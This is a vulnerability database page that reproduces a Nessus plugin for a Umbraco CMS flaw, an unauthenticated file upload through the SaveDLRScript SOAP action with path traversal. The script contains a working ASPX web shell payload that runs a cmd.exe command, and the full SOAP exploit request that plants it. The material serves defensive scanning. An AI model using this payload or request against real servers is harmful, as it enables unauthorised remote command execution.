Lucene search
K

Umbraco codeEditorSave.asmx SaveDLRScript Operation Traversal File Upload Arbitrary Command Execution

🗓️ 13 Aug 2012 00:00:00Reported by TenableType 
nessus
 nessus
🔗 www.tenable.com👁 480 Views

Umbraco codeEditorSave.asmx SaveDLRScript Operation Traversal File Upload Arbitrary Command Execution. Unauthenticated remote attackers can upload arbitrary files using the 'SaveDLRScript' SOAP action of the 'codeEditorSave.asmx' script. This allows an attacker to execute arbitrary commands on the affected host

Refs
Code
SourceLink
nessuswww.nessus.org/u
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(61517);
  script_version("1.10");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
  script_bugtraq_id(54351);
  script_xref(name:"EDB-ID", value:"19671");

  script_name(english:"Umbraco codeEditorSave.asmx SaveDLRScript Operation Traversal File Upload Arbitrary Command Execution");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server hosts an application that can be abused to
execute arbitrary code.");
  script_set_attribute(attribute:"description", value:
"The version of Umbraco installed on the remote host allows
unauthenticated remote attackers to upload arbitrary files using the
'SaveDLRScript' SOAP action of the 'codeEditorSave.asmx' script.  In
addition, these files can be stored in a web-accessible location using
encoded traversal strings. 

These issues together allow an attacker to upload a malicious script to
the affected host and use it to execute arbitrary commands, subject to
the privileges under which the web server operates.");
  # https://blog.gdssecurity.com/labs/2012/7/3/find-bugs-faster-with-a-webmatrix-local-reference-instance.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?064f577f");
  script_set_attribute(attribute:"solution", value:
"Unknown at this time.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:ND");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Umbraco CMS Remote Command Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2012/07/09");
  script_set_attribute(attribute:"patch_publication_date", value:"2011/09/01");
  script_set_attribute(attribute:"plugin_publication_date", value:"2012/08/13");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:umbraco:umbraco_cms");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2012-2022 Tenable Network Security, Inc.");

  script_dependencies("umbraco_detect.nasl");
  script_require_keys("www/umbraco", "www/ASP");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");

port = get_http_port(default:80);

install = get_install_from_kb(
  appname      : "umbraco",
  port         : port,
  exit_on_fail : TRUE
);

dir = install["dir"];
vulnerable = FALSE;

payload = '<%@ Page Language="C#" EnableViewState="false" %>\r
<%@ Import Namespace="System.Web.UI.WebControls" %>\r
<%@ Import Namespace="System.Diagnostics" %>\r
<%@ Import Namespace="System.IO" %>\r
<%\r
        string outstr = "";\r
        string dir = Page.MapPath(".") + "/";\r
        if (Request.QueryString["fdir"] != null)\r
        dir = Request.QueryString["fdir"] + "/";\r
        dir = dir.Replace("\\\\", "/");\r
        dir = dir.Replace("//", "/");\r
        Process p = new Process();\r
        p.StartInfo.CreateNoWindow = true;\r
        p.StartInfo.FileName = "cmd.exe";\r
        p.StartInfo.Arguments = "/c ipconfig /all";\r
        p.StartInfo.UseShellExecute = false;\r
        p.StartInfo.RedirectStandardOutput = true;\r
        p.StartInfo.RedirectStandardError = true;\r
        p.StartInfo.WorkingDirectory = dir;\r
        p.Start();\r
        lblCmdOut.Text = p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd();    \r
%>\r
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\r
<html xmlns="http://www.w3.org/1999/xhtml">\r
<body>
<pre><asp:Literal runat="server" ID="lblCmdOut" Mode="Encode"></asp:Literal></pre>\r
</body>\r
</html>\r';

exp_script = (SCRIPT_NAME - ".nasl") + "-" + unixtime() + ".aspx";

exploit = '<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <SaveDLRScript xmlns="http://tempuri.org/">
      <fileName>/..\\..\\..\\umbraco\\' + exp_script + '</fileName>
      <oldName>string</oldName>
      <fileContents>' + payload + '
      </fileContents>
      <ignoreDebugging>1</ignoreDebugging>
    </SaveDLRScript>
  </soap:Body>
</soap:Envelope>';

res = http_send_recv3(
  method : "POST",
  port   : port,
  item   : dir + "/webservices/codeEditorSave.asmx",
  data   : exploit,
  add_headers : make_array("SOAPAction", '"http://tempuri.org/SaveDLRScript"',
  "Content-Type", "text/xml; charset=utf-8")
);
report_req = http_last_sent_request();

if ("<soap:Fault><faultcode>soap:Server</faultcode>" >< res[2])
{
  url = dir + "/" + exp_script;

  res2 = http_send_recv3(
    method          : "GET",
    item            : url,
    port            : port,
    exit_on_fail    : TRUE
  );

  if (
    "Windows IP Configuration" >< res2[2] &&
    "Subnet Mask" >< res2[2]
  )
  {
    vulnerable = TRUE;
    file_url = build_url(port:port, qs:url);
  }
}

if (!vulnerable)
{
  loc = build_url(port:port, qs:dir + "/");
  audit(AUDIT_WEB_APP_NOT_AFFECTED, "Umbraco", loc);
}

report = NULL;
if (report_verbosity > 0)
{
  snip = crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30);
  report =
    '\nNessus was able to verify the issue exists with the following request : ' +
    '\n' +
    '\n' + file_url +
    '\n' +
    '\n  Note : This file has not been removed and will need to be manually deleted.' +
    '\n';
  if (report_verbosity > 1)
  {
    out_full = strstr(res2[2], "Windows IP Configuration");
    output = ereg_replace(string:out_full, pattern:"<\/(pre|body|html)>", replace:"");

    report +=
      '\nThe file was uploaded by using the following request : ' +
      '\n' +
      '\n' + snip +
      '\n' + report_req +
      '\n' + snip +
      '\n' +
      '\nThe file uploaded to the remote host produced the following output : ' +
      '\n' +
      '\n' + snip +
      '\n' + chomp(output) +
      '\n' + snip +
      '\n';
  }
  security_hole(port:port, extra:report);
  exit(0);
}
else security_hole(port:port);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation